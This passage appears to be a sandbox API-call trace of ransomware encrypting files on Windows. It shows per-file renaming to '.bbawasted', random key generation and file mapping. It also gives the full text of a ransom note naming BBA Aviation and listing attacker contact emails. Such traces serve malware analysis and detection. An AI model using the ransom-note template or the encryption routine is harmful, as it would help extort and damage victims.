KEY:\r\n[begin_key]jWOdsBChy9LkzmLUViTKlQCqjZF8fMwlkoUyJMNTmriTXQ0zY4yoBEwfK2XV/QiO\r\n1tQN0QhoGKzJTqBzkVR0y/IGBJ76EdVLKSi0XctKTRrypi66mLSLG+hsHrKy3jO2\r\n/H2NolT7nq0+JcQpjCBAm65fkMDp4yKG+ERbS8RkGnxSFbw9gfre59PRPOFSFIYi\r\nCGHaD52SksDMJgsrceiPdub52xk4nAUIMdjKe8WvVNfZipFUu8CPnMj1a9Y+1Xbf\r\nzl6fjEmZSzPiVvRqvOldp1EG2u6oZAV2rC9hE/uOBvgdOf+j+LDYIgFlTFSEeUDM\r\n//Xcy/qQWLl9DytPmKs/qKuGwJJhqRKp1aCheMRbCNFH/BMGoIcWWF/MV2rh1wKx\r\n3g8JXTjVc6JBYCzlOgakZXKc4yclgOm3ECJwPiiCjA7R4v6LdgCkB+Ak3gr0dBZ8\r\n8xr7YY7TlgZYeb1tXmQKTUyu7CSponCC/feq/RynJOk6GOGEd4o4iN1L9RKcxrtA\r\nNk13/0ZYgcEOuXNOzSIokvrS1Vz/x1Jc2jOkiTvUjUk9hlCxzKnP1JvLTZs0wC0j\r\n2b4zdVmVrILqjC5/efHmvFGPiLXLPLPdXTre2aWk6pfGJlPvZIE3nOjy94cf/c4u\r\nFS/dzyT+LdnKYkWSs5eFPEqksVvHgTjukPlBuZsksQc=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.887] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.887] WriteFile (in: hFile=0x290, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0161.887] SetEndOfFile (hFile=0x290) returned 1 [0161.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.890] CloseHandle (hObject=0x290) returned 1 [0161.892] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0161.892] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3260 | out: hHeap=0x660000) returned 1 [0161.892] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0161.893] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0161.893] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0161.893] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 39 [0161.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0161.893] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.893] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0161.894] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.894] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.894] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0161.900] WriteFile (in: hFile=0x290, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.902] SetEndOfFile (hFile=0x290) returned 1 [0161.902] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.902] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.902] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.bbawasted")) returned 1 [0161.903] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0161.903] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0161.903] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xf19 [0161.903] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf19) returned 0x650000 [0161.903] CloseHandle (hObject=0x294) returned 1 [0161.919] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0161.919] CloseHandle (hObject=0x288) returned 1 [0161.919] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.919] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0161.920] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.920] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.920] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0161.921] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0161.921] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.973] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.973] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.973] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]tkrqRuNZd9H7v9ATnVE7/0OJBukToELlfsBRCmvydCKqEed0Da0PyUgN+CO0/aey\r\n/vbFymAcWz7UCU+jymGzqZ8RZsqmPlJUl79qBP/5rCc7vwjcmoLcfechz+vGuH7Y\r\nGnlQPVSafxAo0Uvf6lx7JKCj4i3SK27AOKq/vxN2SqJMS2zJiSY4zNC4qjxOvH2s\r\ndQeMrWjeKKzjYQPxWK/q9d/TgzlKCHmrbR4UBhoA+M7kmUomxkPKu3jelgQxxarO\r\nbC+4jc9e7SUjNzooT/u8K/MJxh50t4k44X4G0VEde7tnkvJIVD+Y5xG6SkEV1UN+\r\nE8ZP0JxCiN/arN0BqoZSzXeowgXDxxWPVjt/6rAbI+EBcwrLF/c0uALa+KJszAZo\r\nm4TPt6jvDnYTE89l+UHrwvkwnUQYM9rb/A44LbzA1VAS9ZHB8rjyPms+mSHMBu5A\r\nLGbQJzN4Ra7kfEf9kkcJ/Zl66l7SrslA6t2/6RrlUIMEH7wvSbMbXxKBI1QA+Z+L\r\nWV2FM+ogJfIvSw0zct4J45bB76k6zNMrOy0LbOMQDCGOeyto+r02f6ozy7xgTyuI\r\nbF0kdywafDKt4Ny6k3Lbk+rlPgjjZirCKnAUT2lF+kItw6g5VQ3ZUf1pPiKzTdbV\r\nmhery0ztX+1l7wXLQI/S/MQTxu8I7m8aaDRQdcSh1RG=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.973] WriteFile (in: hFile=0x290, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0161.973] SetEndOfFile (hFile=0x290) returned 1 [0161.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.976] CloseHandle (hObject=0x290) returned 1 [0162.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0162.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a27e0 | out: hHeap=0x660000) returned 1 [0162.126] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0162.126] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0162.126] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0162.126] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 48 [0162.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6aecf0 [0162.126] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.126] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef68) returned 1 [0162.127] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0162.127] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.127] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0162.127] WriteFile (in: hFile=0x290, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.128] SetEndOfFile (hFile=0x290) returned 1 [0162.129] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.129] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.bbawasted")) returned 1 [0162.129] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0162.129] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0162.130] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x12c12 [0162.130] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12c12) returned 0x640000 [0162.130] CloseHandle (hObject=0x288) returned 1 [0162.139] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0162.139] CloseHandle (hObject=0x294) returned 1 [0162.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.140] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef68) returned 1 [0162.140] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.140] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.140] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef68) returned 1 [0162.141] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0162.141] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.149] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]b0gz940qjJkHdWFzncQfWkuioBkcEd0Vhd7D9KfOnidSEnIerYFwV5S/7elgBShC\r\n5CRnD7zV2xAW+wEWwnS100Be6KrVx1nbK5THBjjILJV6Pyt8xluaOC9GcrUjvzQu\r\nKVxQBUcj8Tm3fYiOKLEjzhu8FnIpQ+dL+rQQH0OnYGZpYrNa/w1hCxp1cJaDFH+5\r\nauMeox3F4Mq1srwEkh6/53rbAHtu2gYeyLdaVEv7wl9pOc7+6mHBygWD7f7kXLh/\r\n5iXdFoVfViAR6cgZeBuarjSdfwgggq5ifbtLG/b3Dm6/fhyLcY1g39o5fvcb6lqJ\r\nsOhCT5hNNDQgz+5h0SMvIk6fgdjESJ3BNvt2yoHQq8wLR9N2J5w8aRrAaFrreJ44\r\nRl2tCUK+PhDfxgNhPgA2CyTA6dNr9bI7TydWJBYcudx0VOfTJ/lQMo2xQSLIK9JA\r\ndNRYah/7nl65Ma7p6lPcykdKgI35LMnPRi/h2G7d2qEw+DNFb6ykmRV2jF1akblN\r\nr9MuBK1Sr0QTosqJ4CFKHu5kp4svJeHB0C6B4QDOXY0mqdB8ZlRsDRuV1Nwqz+BQ\r\nWueKQ35YED2DetJ6rB4Fa7otPqqarnrps2xPBlvnggU9KAgIm/zAYfImsFpsioj8\r\njTpNRDC35MsYEs3e4u+Hf1/p90FiXACg42FtVrFE4b9=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.149] WriteFile (in: hFile=0x290, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0162.150] SetEndOfFile (hFile=0x290) returned 1 [0162.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.152] CloseHandle (hObject=0x290) returned 1 [0162.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0162.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2378 | out: hHeap=0x660000) returned 1 [0162.208] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0162.208] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0162.209] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0162.209] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 48 [0162.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6aecf0 [0162.209] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.209] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef68) returned 1 [0162.209] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0162.209] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.209] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0162.210] WriteFile (in: hFile=0x290, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.211] SetEndOfFile (hFile=0x290) returned 1 [0162.211] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.211] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.bbawasted")) returned 1 [0162.212] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0162.212] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0162.213] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xed0c [0162.213] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xed0c) returned 0x640000 [0162.213] CloseHandle (hObject=0x294) returned 1 [0162.222] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0162.222] CloseHandle (hObject=0x288) returned 1 [0162.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.222] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef68) returned 1 [0162.223] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.223] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.224] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef68) returned 1 [0162.224] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0162.224] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.235] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]SRBICLZQW/DLxJKq+5ytuRnsCgz5Cp+Sp0gtK33fGcXJ90fpfVxW1ko3Jf4meAvQ\r\nz/FKEdf9WsYQ5PYXXWcGiDPD5UAisZ8jZvNqvswOTl03yp0+COMcsGKXVIQg+fGs\r\nIT+42MKWWKRMkuf1iDZcHsyUBS59wLl8NZUly4tmtOxWDNz9CYrfTJdAssxZM6Jt\r\nhCHwV5TD3Q8s5qw5rjHAHmpRv/xJSmHcs6Jbkcaq281pMwd60w63f6eW82ftZI1Q\r\ndbcrKwEaTqCrx0IS2DGkGtwrUIIcsHLBkUL7LaN2AxazitIGMYcjz9zsmL+TJtYr\r\n8I9aQcf3dA8bQeslNESMuL2OBo2PSFEjjGW+dha/afZQ2ot1H4sF/KvMSA6JtPiJ\r\nGlCvqJI0ZF3piHqmdqKdlonQTGuJ3YC+JHOyGHudBgnoz8xymqf7YRuNVcE0K69n\r\nFv3oylP5sRR5jm0uWwoEbpPSXt8PgfAzbKkucaLAdXTNi6mF/j8HWa+KfzmHOJhG\r\nCpr4tcMR0DaCnP3POpYZxKxAP/KibatRiZW+9Z/AHWpZ6WWzMW5V6dxK5xq3empL\r\nBXzF+M0Pgq5+l4T2qkZu0bc6g7aO1EHCq/BL1uU4Vw4eRLB0IRyIaWUBKcmlnvOS\r\n0YeJHZaXD5+70WvFkKNUmbhS7pQ04RlnTN/57zBBL41=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.235] WriteFile (in: hFile=0x290, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0162.235] SetEndOfFile (hFile=0x290) returned 1 [0162.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.238] CloseHandle (hObject=0x290) returned 1 [0162.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0162.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1a78 | out: hHeap=0x660000) returned 1 [0162.252] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0162.253] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0162.253] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0162.253] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 39 [0162.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0162.253] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.253] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0162.254] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0162.254] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.289] CreateFileW 